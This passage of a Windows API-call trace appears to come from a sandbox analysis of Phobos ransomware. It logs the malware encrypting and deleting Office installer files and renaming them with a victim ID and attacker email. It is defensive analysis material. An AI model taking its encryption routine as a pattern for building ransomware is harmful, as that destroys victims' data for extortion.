(in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1992192) returned 1 [0163.298] CloseHandle (hObject=0x188) returned 1 [0163.298] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0163.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0163.299] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0163.299] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0163.299] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0163.299] ReadFile (in: hFile=0x188, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0163.327] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0163.327] ReadFile (in: hFile=0x188, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0163.778] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0163.778] ReadFile (in: hFile=0x188, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0163.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32ca8) returned 1 [0163.920] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0163.920] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0163.925] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0163.925] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0163.925] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0163.949] SetEndOfFile (hFile=0x188) returned 1 [0163.949] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0163.949] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0163.951] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0163.951] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0163.953] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0163.953] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0163.956] CloseHandle (hObject=0x188) returned 1 [0163.956] SetEvent (hEvent=0xe8) returned 1 [0163.956] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0163.956] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0163.957] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1463568) returned 1 [0163.957] CloseHandle (hObject=0x188) returned 1 [0163.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0163.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.957] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0163.957] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0163.957] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0163.957] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0163.957] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0163.957] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0163.957] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0164.005] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0164.016] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0164.050] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x55410, lpOverlapped=0x0) returned 1 [0164.050] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x55420, dwBufLen=0x55420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x55420) returned 1 [0164.053] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x55420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x55420, lpOverlapped=0x0) returned 1 [0164.059] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0164.059] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0164.059] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0164.059] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.059] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0164.060] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.060] CloseHandle (hObject=0x188) returned 1 [0164.060] CloseHandle (hObject=0x148) returned 1 [0164.060] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0164.063] SetEvent (hEvent=0xe8) returned 1 [0164.063] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0164.064] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0164.064] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=715834) returned 1 [0164.064] CloseHandle (hObject=0x148) returned 1 [0164.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0164.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.064] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0164.064] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0164.064] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0164.064] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0164.065] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0164.065] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0164.065] ReadFile (in: hFile=0x148, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xaec3a, lpOverlapped=0x0) returned 1 [0164.109] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xaec40, dwBufLen=0xaec40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xaec40) returned 1 [0164.116] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xaec40, lpOverlapped=0x0) returned 1 [0164.127] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0164.127] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0164.127] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0164.127] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.128] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0164.128] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.128] CloseHandle (hObject=0x148) returned 1 [0164.128] CloseHandle (hObject=0x188) returned 1 [0164.133] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0164.139] SetEvent (hEvent=0xe8) returned 1 [0164.139] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0164.139] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0164.142] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1377656) returned 1 [0164.142] CloseHandle (hObject=0x188) returned 1 [0164.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0164.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.142] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0164.142] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0164.142] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0164.142] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0164.142] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0164.142] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0164.142] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0164.194] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0164.202] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0164.257] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x40478, lpOverlapped=0x0) returned 1 [0164.257] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40480, dwBufLen=0x40480 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40480) returned 1 [0164.259] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x40480, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x40480, lpOverlapped=0x0) returned 1 [0164.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0164.264] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0164.264] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0164.264] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.264] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0164.264] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.264] CloseHandle (hObject=0x188) returned 1 [0164.264] CloseHandle (hObject=0x148) returned 1 [0164.264] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0164.268] SetEvent (hEvent=0xe8) returned 1 [0164.268] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0164.268] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0164.268] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=195011319) returned 1 [0164.268] CloseHandle (hObject=0x148) returned 1 [0164.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab")) returned 0x2020 [0164.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0164.269] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0164.269] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0164.269] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0164.269] ReadFile (in: hFile=0x148, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0164.799] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0164.799] ReadFile (in: hFile=0x148, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0164.933] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0164.933] ReadFile (in: hFile=0x148, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0165.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32c68) returned 1 [0165.106] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0165.106] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0165.114] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.114] SetFilePointerEx (in: hFile=0x148, 